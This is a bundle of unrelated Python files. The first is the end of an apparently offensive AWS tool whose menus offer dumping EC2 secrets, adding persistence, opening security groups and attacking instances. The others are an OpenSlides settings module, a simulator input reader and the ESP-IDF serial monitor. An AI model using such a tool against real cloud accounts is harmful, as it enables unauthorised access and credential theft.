def set_aws_creds(caller):
"""
Set the AWS credentials of the targeted AWS account.
:param caller: Calling menu
:return: None
"""
global menu_stack
global my_aws_creds
readline.set_completer(None)
aws_access_key_id = getpass('Enter your AWS Access Key ID:')
puts(color("[*] Key id is: %s************%s"%(aws_access_key_id[0:2],aws_access_key_id[-3:-1])))
aws_secret_access_key = getpass('Enter AWS Secret Access Key:')
puts(color("[*] secret key is: %s************%s"%(aws_secret_access_key[0:2],aws_secret_access_key[-3:-1])))
aws_session_token = getpass("Enter your session token, only if needed: ")
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name='us-west-2')
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name='us-west-2', aws_session_token=aws_session_token)
ec2client = mysession.client('ec2')
regionresponse = ''
choose_your_region = False
possible_regions = []
try:
regionresponse = ec2client.describe_regions()
except Exception as e:
if "OptInRequired" in str(e):
puts(color("[!] OptInRequired Error: The keys are valid but you have a problem in your AWS account."
"Your account may be under validation by AWS. Is it a new account?"))
elif "UnauthorizedOperation" in str(e):
choose_your_region = True
else:
puts(color("[!] Error accessing AWS services. Double check your AWS keys, tokens, privileges and region."))
print(e)
if choose_your_region == False:
go_to_menu(caller)
if choose_your_region == True:
chosen_region = prompt.query('What is your preferred AWS region?',default='us-west-2')
else:
regions = regionresponse['Regions']
region_table = PrettyTable(['Region'])
possible_regions = []
for region in regions:
region_table.add_row([region['RegionName']])
possible_regions.append(region['RegionName'])
print(region_table)
chosen_region = prompt.query('What is your preferred AWS region?',default='us-west-2')
if chosen_region not in possible_regions:
puts(color("[!] Invalid AWS region! Exiting...."))
exit()
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=chosen_region)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=chosen_region,aws_session_token=aws_session_token)
my_aws_creds = {'aws_access_key_id':aws_access_key_id,'aws_secret_access_key':aws_secret_access_key,'region_name':chosen_region,'aws_session_token':aws_session_token,'session':mysession,'possible_regions':possible_regions}
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)#menu_backward()
def set_aws_creds_inline(aws_access_key_id,aws_secret_access_key,region_name,aws_session_token):
"""
Set AWS credentials to the target account from the command line arguments directly, no prompts.
:param aws_access_key_id: access key id
:param aws_secret_access_key: access secret key
:param region_name: region name
:param aws_session_token: token, if any
:return: None
"""
global my_aws_creds
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name, aws_session_token=aws_session_token)
ec2client = mysession.client('ec2')
regionresponse = ''
try:
regionresponse = ec2client.describe_regions()
except Exception as e:
if "OptInRequired" in str(e):
puts(color("[!] OptInRequired Error: The keys are valid but you have a problem in your AWS account."
"Your account may be under validation by AWS. Is it a new account?"))
else:
puts(color("[!] Error accessing AWS services. Double check your AWS keys, tokens, privileges and region."))
exit()
regions = regionresponse['Regions']
possible_regions = []
for region in regions:
possible_regions.append(region['RegionName'])
if region_name not in possible_regions:
puts(color("[!] Invalid AWS region! Exiting...."))
exit()
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name,aws_session_token=aws_session_token)
my_aws_creds = {'aws_access_key_id':aws_access_key_id,'aws_secret_access_key':aws_secret_access_key,'region_name':region_name,'aws_session_token':aws_session_token,'session':mysession,'possible_regions':possible_regions}
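# Usage sketch (the credentials below are the standard AWS documentation placeholders;
# never hard-code real keys):
#   set_aws_creds_inline('AKIAIOSFODNN7EXAMPLE',
#                        'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
#                        'us-west-2', '')
# On success, my_aws_creds holds the boto3 session plus the regions the keys can describe.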
def show_aws_creds(caller):
"""
List AWS credentials used to connect to this AWS account.
:param caller: calling menu
:return: None
"""
global menu_stack
global my_aws_creds
if my_aws_creds == {}:
puts(color('[!] You haven\'t set your AWS credentials yet. Run the command setprofile to set them'))
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)
try:
puts(color('[+] Your AWS credentials:'))
puts(color('[*] access key id: %s'%my_aws_creds['aws_access_key_id']))
puts(color('[*] secret access key: %s'%my_aws_creds['aws_secret_access_key']))
puts(color('[*] session token: %s'%my_aws_creds['aws_session_token']))
puts(color('[*] region: %s'%my_aws_creds['region_name']))
except:
puts(color('[!] You haven\'t set your AWS credentials yet. Run the command setprofile to set them'))
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)
def main_help():
"""
Display Main Menu help options.
:return: None
"""
print(""" Main Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
showsecrets - Show credentials and secrets acquired from the target AWS account
training - Go to training mode
dumpsecrets - Gather and dump credentials of EC2 in Secrets Manager and Parameter Store
attacksurface - Discover attack surface of target AWS account
addtosecgroups - Add IPs and ports to security groups
persistence - Add persistence and hide deeper
ec2instances - Go to EC2 instances menu
securitygroups - List all discovered Security Groups
""")
main_loop()
MAINCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'showsecrets',
'training','dumpsecrets','attacksurface','addtosecgroups','persistence','ec2instances','securitygroups']
def maincomplete(text, state):
"""
Autocomplete for the main menu commands.
"""
for cmd in MAINCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def training_help():
"""
Display command options for the training menu.
:return: None
"""
print(""" Training Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
start - Start training mode
""")
training_loop()
TRAININGCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'start']
def trainingcomplete(text, state):
"""
Autocomplete for training menu.
"""
for cmd in TRAININGCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def instances_help():
"""
Display command options for the EC2 instances menu.
:return:
"""
print(""" EC2 instances Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
showsecrets - Show credentials and secrets acquired from the target AWS account
ec2attacks - Launch attacks against running EC2 instances
list - List all discovered EC2 instances
dumpsecrets - Gather and dump credentials of EC2 in Secrets Manager and Parameter Store
attacksurface - Discover attack surface of target AWS account
securitygroups - List all discovered Security Groups
commandresults - Check command results
instance - Get more details about an instance
""")
instances_loop()
INSTANCESCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'showsecrets',
'ec2attacks','dumpsecrets','attacksurface','list','commandresults','securitygroups', 'instance']
def instancecomplete(text, state):
"""
Autocomplete for EC2 instances menu
"""
for cmd in INSTANCESCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
asciilogo = """
.
:y-
:yy:
/ys/:`
/yo/::-
/y+/::::`
+y/+:::::-
+s:+:::::::`
`+s-+::::::::-
`oo.o/:::::::-`
`o+.o/::::::::
`o/`s/::::::/o:
`o:`s+::::::/sy`
.o-`s+-----::+++..........`
` .+.`so-------------------::` .`
``.--` .+``so-----:::::::::-----:-` oys+-.`
`..---..` ./ `ys----::/+++++oo/----:- .:+yhhyo:.`
`.----.`` .: `ys:---::+oyssooo+----::....``` .-+shhyo/-`
``.----.`` .- `yh+++++ooooo+//::----:. `` ` `-/oyhhs+:``
.----.` .. :/::-..`` `-----:--:/+o/ ` .:+ydhy:
.----.` .` `..-----/ssssss+ `. `.:oydhy:
``.----.` ` ``.-:/+os/----:+ysssss+ .- `-/oydhy+:.
``.----.`` `.--:/+ooossssy/----:+osssss+` -- `-+shhhs/-`
`..---..` ```` `-ooooosyys+/::ossoooo+` :- `:oyddyo:.
``.--` /oooosyyyysooosooooo+` /- shs+-`
`+ooooooooooooooooooo+` `+- `
.oooooooooooooooooooo+` .o-
.//////////yyyso+++++` -s-
yys++++++` :s-
oo++++++. /s-
`/++++++.`+o.
./++++++.`oo.
:////+/..so-
./////.:y+-
`////-/y+-
://-+y+-
./:oy+-
`/sy/-
oy/-
//-
`--. `-
-dd/
-dd/`-:-` `.----.` `..``---` `---``..
-ddysyhdy: :sooooys: /yyossss/ -sysoosyy`
-ddy` `ydh` ..---:sys /yy+` `` `yyo` `syy`
-dd+ odd. .oyyo++yyy /yy. .yy/ +yy`
-ddy``.hdh /yy: `yyy /yy. `yys```syy`
-hhsyyhhy- .sys++osyy /yy. -syyossyy`
`..``--. ..-. ... `.. .-. +yy`
+yy`
`..
"""
start()
|
main.py
|
import argparse
import ctypes
import os
import sys
import tempfile
import threading
import time
import webbrowser
from typing import Dict, Optional
from django.conf import ENVIRONMENT_VARIABLE
from django.core.exceptions import ImproperlyConfigured
from django.utils.crypto import get_random_string
from mypy_extensions import NoReturn
DEVELOPMENT_VERSION = "Development Version"
UNIX_VERSION = "Unix Version"
WINDOWS_VERSION = "Windows Version"
WINDOWS_PORTABLE_VERSION = "Windows Portable Version"
class PortableDirNotWritable(Exception):
pass
class PortIsBlockedError(Exception):
pass
class DatabaseInSettingsError(Exception):
pass
class UnknownCommand(Exception):
pass
class ExceptionArgumentParser(argparse.ArgumentParser):
def error(self, message: str) -> NoReturn:
raise UnknownCommand(message)
def detect_openslides_type() -> str:
"""
Returns the type of this OpenSlides version.
"""
if sys.platform == "win32":
if os.path.basename(sys.executable).lower() == "openslides.exe":
# Note: sys.executable is the path of the *interpreter*
# the portable version embeds python so it *is* the interpreter.
# The wrappers generated by pip and co. will spawn the usual
# python(w).exe, so there is no danger of mistaking them
# for the portable even though they may also be called
# openslides.exe
openslides_type = WINDOWS_PORTABLE_VERSION
else:
openslides_type = WINDOWS_VERSION
else:
openslides_type = UNIX_VERSION
return openslides_type
def get_default_settings_dir(openslides_type: str = None) -> str:
"""
Returns the default settings path according to the OpenSlides type.
The argument 'openslides_type' has to be one of the three types mentioned in
openslides.utils.main.
"""
if openslides_type is None:
openslides_type = detect_openslides_type()
if openslides_type == UNIX_VERSION:
parent_directory = os.environ.get(
"XDG_CONFIG_HOME", os.path.expanduser("~/.config")
)
elif openslides_type == WINDOWS_VERSION:
parent_directory = get_win32_app_data_dir()
elif openslides_type == WINDOWS_PORTABLE_VERSION:
parent_directory = get_win32_portable_dir()
else:
raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
return os.path.join(parent_directory, "openslides")
def get_local_settings_dir() -> str:
"""
Returns the path to a local settings.
On Unix systems: 'personal_data/var/'
"""
return os.path.join("personal_data", "var")
def setup_django_settings_module(
settings_path: str = None, local_installation: bool = False
) -> None:
"""
Sets the environment variable ENVIRONMENT_VARIABLE, that means
'DJANGO_SETTINGS_MODULE', to the given settings.
If no settings_path is given and the environment variable is already set,
then this function does nothing.
If the argument settings_path is set, then the environment variable is
always overwritten.
"""
if settings_path is None and os.environ.get(ENVIRONMENT_VARIABLE, ""):
return
if settings_path is None:
if local_installation:
settings_dir = get_local_settings_dir()
else:
settings_dir = get_default_settings_dir()
settings_path = os.path.join(settings_dir, "settings.py")
settings_file = os.path.basename(settings_path)
settings_module_name = ".".join(settings_file.split(".")[:-1])
if "." in settings_module_name:
raise ImproperlyConfigured(
"'.' is not an allowed character in the settings-file"
)
# Change the python path. Also set the environment variable python path, so
# change of the python path also works after a reload
settings_module_dir = os.path.abspath(os.path.dirname(settings_path))
sys.path.insert(0, settings_module_dir)
try:
os.environ["PYTHONPATH"] = os.pathsep.join(
(settings_module_dir, os.environ["PYTHONPATH"])
)
except KeyError:
# The environment variable is empty
os.environ["PYTHONPATH"] = settings_module_dir
# Set the environment variable to the settings module
os.environ[ENVIRONMENT_VARIABLE] = settings_module_name
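# Minimal usage sketch (the path is a hypothetical example):
#   setup_django_settings_module("/home/user/.config/openslides/settings.py")
# Afterwards os.environ[ENVIRONMENT_VARIABLE] == "settings" and the directory containing
# settings.py has been prepended to sys.path, so Django can import it by module name.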
def get_default_settings_context(user_data_dir: str = None) -> Dict[str, str]:
"""
Returns the default context values for the settings template:
'openslides_user_data_path', 'import_function' and 'debug'.
The argument 'user_data_path' is a given path for user specific data or None.
"""
# Setup path for user specific data (SQLite3 database, media, ...):
# Take it either from command line or get default path
default_context = {}
if user_data_dir:
default_context["openslides_user_data_dir"] = repr(user_data_dir)
default_context["import_function"] = ""
else:
openslides_type = detect_openslides_type()
if openslides_type == WINDOWS_PORTABLE_VERSION:
default_context[
"openslides_user_data_dir"
] = "get_win32_portable_user_data_dir()"
default_context[
"import_function"
] = "from openslides.utils.main import get_win32_portable_user_data_dir"
else:
data_dir = get_default_user_data_dir(openslides_type)
default_context["openslides_user_data_dir"] = repr(
os.path.join(data_dir, "openslides")
)
default_context["import_function"] = ""
default_context["debug"] = "False"
return default_context
def get_default_user_data_dir(openslides_type: str) -> str:
"""
Returns the default directory for user specific data according to the OpenSlides
type.
The argument 'openslides_type' has to be one of the three types mentioned
in openslides.utils.main.
"""
if openslides_type == UNIX_VERSION:
default_user_data_dir = os.environ.get(
"XDG_DATA_HOME", os.path.expanduser("~/.local/share")
)
elif openslides_type == WINDOWS_VERSION:
default_user_data_dir = get_win32_app_data_dir()
elif openslides_type == WINDOWS_PORTABLE_VERSION:
default_user_data_dir = get_win32_portable_dir()
else:
raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
return default_user_data_dir
def get_win32_app_data_dir() -> str:
"""
Returns the directory of Windows' AppData directory.
"""
shell32 = ctypes.WinDLL("shell32.dll") # type: ignore
SHGetFolderPath = shell32.SHGetFolderPathW
SHGetFolderPath.argtypes = (
ctypes.c_void_p,
ctypes.c_int,
ctypes.c_void_p,
ctypes.c_uint32,
ctypes.c_wchar_p,
)
SHGetFolderPath.restype = ctypes.c_uint32
CSIDL_LOCAL_APPDATA = 0x001C
MAX_PATH = 260
buf = ctypes.create_unicode_buffer(MAX_PATH)
res = SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, 0, buf)
if res != 0:
# TODO: Write other exception
raise Exception("Could not determine Windows' APPDATA path")
return buf.value # type: ignore
def get_win32_portable_dir() -> str:
"""
Returns the directory of the Windows portable version.
"""
# NOTE: sys.executable will be the path to openslides.exe
# since it is essentially a small wrapper that embeds the
# python interpreter
portable_dir = os.path.dirname(os.path.abspath(sys.executable))
try:
fd, test_file = tempfile.mkstemp(dir=portable_dir)
except OSError:
raise PortableDirNotWritable(
"Portable directory is not writeable. "
"Please choose another directory for settings and data files."
)
else:
os.close(fd)
os.unlink(test_file)
return portable_dir
def get_win32_portable_user_data_dir() -> str:
"""
Returns the user data directory to the Windows portable version.
"""
return os.path.join(get_win32_portable_dir(), "openslides")
def write_settings(
settings_dir: str = None,
settings_filename: str = "settings.py",
template: str = None,
**context: str,
) -> str:
"""
Creates the settings file at the given dir using the given values for the
file template.
Returns the path to the created settings.
"""
if settings_dir is None:
settings_dir = get_default_settings_dir()
settings_path = os.path.join(settings_dir, settings_filename)
if template is None:
with open(
os.path.join(os.path.dirname(__file__), "settings.py.tpl")
) as template_file:
template = template_file.read()
# Create a random SECRET_KEY to put it in the settings.
# from django.core.management.commands.startproject
chars = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)"
context.setdefault("secret_key", get_random_string(50, chars))
for key, value in get_default_settings_context().items():
context.setdefault(key, value)
content = template % context
settings_module = os.path.realpath(settings_dir)
if not os.path.exists(settings_module):
os.makedirs(settings_module)
with open(settings_path, "w") as settings_file:
settings_file.write(content)
if context["openslides_user_data_dir"] == "get_win32_portable_user_data_dir()":
openslides_user_data_dir = get_win32_portable_user_data_dir()
else:
openslides_user_data_dir = context["openslides_user_data_dir"].strip("'")
os.makedirs(os.path.join(openslides_user_data_dir, "static"), exist_ok=True)
return os.path.realpath(settings_path)
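def _example_write_settings(tmp_dir: Optional[str] = None) -> str:
    """
    Sketch only (never called by this module): shows one way write_settings could be used
    to generate a settings file in a scratch directory. The directory prefix and the debug
    override are illustrative assumptions, not part of OpenSlides itself.
    """
    if tmp_dir is None:
        tmp_dir = tempfile.mkdtemp(prefix="openslides-example-")
    # The remaining template keys (secret_key, user data dir, ...) fall back to the
    # defaults produced by get_default_settings_context() inside write_settings().
    return write_settings(settings_dir=tmp_dir, debug="True")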
def open_browser(host: str, port: int) -> None:
"""
Launches the default web browser at the given host and port and opens
the webinterface. Uses start_browser internally.
"""
if host == "0.0.0.0":
# Windows does not support 0.0.0.0, so use 'localhost' instead
start_browser(f"http://localhost:{port}")
else:
start_browser(f"http://{host}:{port}")
def start_browser(browser_url: str) -> None:
"""
Launches the default web browser at the given url and opens the
webinterface.
"""
try:
browser = webbrowser.get()
except webbrowser.Error:
print("Could not locate runnable browser: Skipping start")
else:
def function() -> None:
# TODO: Use a nonblocking sleep event here.
time.sleep(1)
browser.open(browser_url)
thread = threading.Thread(target=function)
thread.start()
def get_database_path_from_settings() -> Optional[str]:
"""
Retrieves the database path out of the settings file. Returns None,
if it is not a SQLite3 database.
Needed for the backupdb command.
"""
from django.conf import settings as django_settings
from django.db import DEFAULT_DB_ALIAS
db_settings = django_settings.DATABASES
default = db_settings.get(DEFAULT_DB_ALIAS)
if not default:
raise DatabaseInSettingsError("Default databases is not configured")
database_path = default.get("NAME")
if not database_path:
raise DatabaseInSettingsError("No path or name specified for default database.")
if default.get("ENGINE") != "django.db.backends.sqlite3":
database_path = None
return database_path
def is_local_installation() -> bool:
"""
Returns True if the command is called for a local installation
This is the case if manage.py is used, or when the --local-installation flag is set.
"""
return "--local-installation" in sys.argv or "manage.py" in sys.argv[0]
def is_windows() -> bool:
"""
Returns True if the current system is Windows. Returns False otherwise.
"""
return sys.platform == "win32"
|
Input.py
|
import datetime
import math
import subprocess
import sys
import threading
import Config
import Event
started = False
position = None
rotation = None
speed = None
rotation_speed = None
lock = threading.Lock()
def init():
args = [sys.argv[1]]
if 'map' in Config.config:
args.append('-map')
args.append(Config.config['map'])
if 'position' in Config.config:
args.append('-pos')
args.append(Config.config['position'])
if 'rotation' in Config.config:
args.append('-rot')
args.append(Config.config['rotation'])
if 'truck' in Config.config:
args.append('-truck')
args.append(Config.config['truck'])
if 'enter' in Config.config:
args.append('-enter')
cmd = subprocess.Popen(args, stdout=subprocess.PIPE)
thread = threading.Thread(target=read_stdin, args=(cmd.stdout,))
thread.start()
def read_stdin(ror_input):
previous_position = [0.0, 0.0, 0.0]
previous_rotation = [0.0, 0.0, 0.0]
previous_timestamp = datetime.datetime.now()
while True:
try:
for byte_array_line in ror_input:
line = byte_array_line.decode('utf-8')
if line[0:9] == "Position:":
timestamp = datetime.datetime.now()
stripped = line.replace('\x1b[0m\n', '').replace(' ', '')
data = stripped.split(':')
numeric_value = data[1].split(',')
global position
global rotation
global speed
global rotation_speed
lock.acquire()
position = [float(numeric_value[0]), float(numeric_value[1]), float(numeric_value[2])]
rotation = [float(numeric_value[3]), float(numeric_value[4]), float(numeric_value[5])]
global started
if started is False:
previous_position = position
previous_rotation = rotation
speed = [0.0, 0.0, 0.0]
rotation_speed = [0.0, 0.0, 0.0]
started = True
else:
duration = timestamp - previous_timestamp
# print("duration", duration.total_seconds())
for i in range(3):
speed[i] = (position[i] - previous_position[i]) / duration.total_seconds()
rotation_speed[i] = (rotation[i] - previous_rotation[i]) / duration.total_seconds()
previous_timestamp = timestamp
previous_position = position
previous_rotation = rotation
lock.release()
Event.set_event()
Event.clear_event()
# print("pos", position)
# print("rot", rotation)
# print("spd", speed)
else:
print(line)
# print(line, end='')
except UnicodeDecodeError:
print("UnicodeDecodeError exception")
def get_position():
global lock
global position
lock.acquire()
ret_position = position
lock.release()
return ret_position
def get_rotation():
global lock
global rotation
lock.acquire()
ret_rotation = rotation
lock.release()
return ret_rotation
def get_speed():
global lock
global speed
lock.acquire()
ret_speed = speed
lock.release()
return ret_speed
def get_speed_norm():
global speed
return math.sqrt(speed[0] * speed[0] + speed[1] * speed[1] + speed[2] * speed[2])
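# Example: with speed == [3.0, 4.0, 0.0] this returns sqrt(9 + 16 + 0) == 5.0; the unit is
# whatever the simulator reports for position over time (presumably metres per second).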
def get_rotation_speed():
global lock
global rotation_speed
lock.acquire()
ret_speed = rotation_speed
lock.release()
return ret_speed
def is_started():
global started
return started
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make flash" (Ctrl-T Ctrl-F)
# - Run "make app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.0"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
# regex matches a potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
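# Editor's example: a backtrace line containing "0x400d1c2a" matches the pattern
# above and is handed to lookup_pc_address() / addr2line; addresses outside the
# 0x4xxxxxxx range are ignored.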
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
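# Editor's sketch: a hypothetical subclass illustrating the StoppableThread
# contract described above -- override run() for the work loop and _cancel() to
# make run() return promptly. _ExampleTicker is not part of the original tool.
class _ExampleTicker(StoppableThread):
    def __init__(self, interval=0.5):
        super(_ExampleTicker, self).__init__()
        self.interval = interval
        self._running = True
    def run(self):
        self._running = True
        # loop until stop() clears the internal thread (alive) or _cancel() runs
        while self.alive and self._running:
            time.sleep(self.interval)
    def _cancel(self):
        self._running = False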
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix':
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
import fcntl, termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except:
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace(b"\n", b"\r\n"),
"CR": lambda c: c.replace(b"\n", b"\r"),
"LF": lambda c: c.replace(b"\r", b"\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._read_line = b""
self._gdb_buffer = b""
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
except:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data):
# this may need to be made more efficient, as it pushes out a byte
# at a time to the console
for b in data:
self.console.write_bytes(b)
if b == b'\n': # end of line
self.handle_serial_input_line(self._read_line.strip())
self._read_line = b""
else:
self._read_line += b
self.check_gdbstub_trigger(b)
def handle_serial_input_line(self, line):
for m in re.finditer(MATCH_PCADDR, line):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [ CTRL_H, 'h', 'H', '?' ]:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {make:7} Run 'make flash' to build & flash
--- {appmake:7} Run 'make app-flash' to build & flash app
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
make=key_description(CTRL_F),
appmake=key_description(CTRL_A),
)
def __enter__(self):
